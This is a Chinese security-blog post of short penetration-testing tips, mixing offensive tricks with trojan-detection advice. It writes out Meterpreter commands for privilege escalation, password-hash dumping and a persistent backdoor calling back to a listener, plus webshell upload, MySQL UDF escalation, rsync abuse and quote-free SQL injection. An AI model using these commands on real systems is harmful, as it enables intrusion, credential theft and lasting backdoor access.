[渗透笔记_广外安全小组](肆)

浏览:
字体:
发布时间:2013-12-12 14:50:58
来源:
我们新开的栏目:【学习笔记】 旨在与小伙伴们分享小编们的学习心得,逆向笔记连载由91ri网络安全研究室的小编们带来,主要为一些短小但又精华的渗透小技巧,这些技巧都是由小编 们在平时读书、学习的时候积累的一些小技巧,初定为每周更新一次。为保证质量,每一篇为20条左右的渗透小记。同时欢迎其他同学们投稿给我们你的笔记与大家分享~
 
1、在Webshell中,如果上传文件时提示缺少对象。可以尝试写一句话,用菜刀连接之后用菜刀上传文件。
 
 
 
2、使用meterpreter的hashdump提取windows口令的哈希值:
 
 
meterpreter > getuid                //获知当前权限级别meterpreter > getsystem        //提升权限meterpreter > run hashdump

 

3、网站http://www.md5decrypter.co.uk/,可提供对NTLM/LM hash值的在线解密(小编注:这个网站破解MD5的命中率也很高哦)。
 
 
 
3、使用meterpreter建立后门:
 
 
meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1-A参数用于在攻击方机器上自动启动监听程序。-S参数表示将后门程序设置为Windows系统启动时加载。-U参数表示后门设置为用户登陆系统时自动执行。-i参数用于设置后门回连到代理处理程序的时间间隔-p是端口号                 -r是目标机器的ip地址

 

 
4、网络纵深防御思想:作为一个公司,它会为物理线路聘用一个巡线员(第一层),在工作组交换机上做端口安全(第二层),在边界路由器上做访问列表(第三层),在防火墙中建立DMZ区和包过滤(第四层),设置IDS/IDP监测/阻拦(第三至七层),建立SSL通道(第六层),设置内容过滤(第七层),提供AAA服务(第七层),进行漏洞扫描(第四至七层)和病毒扫描(第七层)等。
 
——摘自《IT安全面试攻略》
 
 
 
5、IPS设备可以提供攻击检测和防御两种功能,如果以镜像方式接入,就使用反应机制;如果以串行方式接入,就使用阻断机制。
 
6、根据ip获知对方电脑的名称:ping  -a  ip地址,
 
如:ping  -a  192.168.235.253
 
7、在系统“windows”文件夹下,点击打开“system.ini”文件,在代码中如果有[boot]代码,其中shell语句的格式一般为“shell=文件名”,如果后面还跟有一个文件名(如shell=文件名+文件名),则很可能是木马程序。
 
 
 
8、在系统“windows”文件夹下,点击打开“win.ini”文件,在代码中如果有“run=?”或者“load=?”代码类型,一定要注意其后的文件。一般情况下,“run=”和“load=”后面就没有内容了,如果有路径或不熟悉的文件名,可能就是木马程序。
 
 
 
9、木马隐藏的方式很多,一般都隐藏在注册表的
 
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
 
目录下。查看键值中有没有不熟悉的可执行文件,该类文件可能就是木马程序。
 
 
 
10、专门捕获网页的嗅探器——艾菲网页侦探:艾菲网页侦探是一个HTTP协议的网络嗅探器,专门捕捉局域网中含有HTTP协议的数据包,并对其进行分析,找出符合过滤器的那些HTTP通信内容。
 
 
 
11、常见的windows XP系统漏洞:RDP漏洞、远程明文账户名传送漏洞、UPnP缓冲溢出漏洞、热键漏洞、拒绝服务漏洞
 
 
 
12、常见window 7系统漏洞:内核驱动程序中的漏洞、辅助驱动程序中的漏洞、IE的积累性安全更新漏洞、颜色控制面板中的漏洞、.NET和Silverlight中的漏洞、SharePoint中的漏洞。
 
 
 
13、清除BIOS密码之魔法攻击法:如果你能进入系统,可以用BiosPwds、CmosPwd等软件清除。(小编注:一般就别想了)
 
 
 
14、清除BIOS密码之物理攻击法:关闭电源,将主板上的正确跳线帽用专业工具挑出,将跳线帽由原来标示为“1”、“2”针脚套在标示为“2”、“3”的针脚上,再将跳线帽复原,打开电源,即可发现BIOS密码已清除。如果遇到较老的机子,可是拆掉电池、再用导电工具短接清除密码。
 
 
 
15、mysql数据库拥有读写文件权限时,成功写入文件的条件需单引号不转义、不可覆盖已存在文件、必须为最后一条语句。因此magic_quotes_gpc必须为0ff。
 
 
 
16、渗透提权过程中,得知mysql数据库连接账号和密码时可以尝试UDF方式提权,前提是系统必须为windows。当然如果权限高的话,还可以使用mof写入系统的方式提权。
 
 
 
17、渗透过程中如目标开启rsync服务,默认873端口,可尝试无口令登录,权限设置不足的可直接上传文件,最不济也可查看目标站点文件。
 
 
 
18、端口转发时如果lcx不起作用,可尝试reduh这个工具,不过速度稍微有点捉急!(其实那速度会让你有砸键盘的冲动)
 
 
 
19、数字型注入中,无单引号注入方法有两种,一种是定义注入字符串为16进制赋值变量@r,然后exec(@r)执行;另外一种是使用char()函数和“+”号来进行。
 
本文为学习笔记,作者为91ri.org团队
>更多相关文章
24小时热门资讯
24小时回复排行
资讯 | QQ | 安全 | 编程 | 数据库 | 系统 | 网络 | 考试 | 站长 | 关于东联 | 安全雇佣 | 搞笑视频大全 | 微信学院 | 视频课程 |
关于我们 | 联系我们 | 广告服务 | 免责申明 | 作品发布 | 网站地图 | 官方微博 | 技术培训
Copyright © 2007 - 2024 Vm888.Com. All Rights Reserved
粤公网安备 44060402001498号 粤ICP备19097316号 请遵循相关法律法规
');})();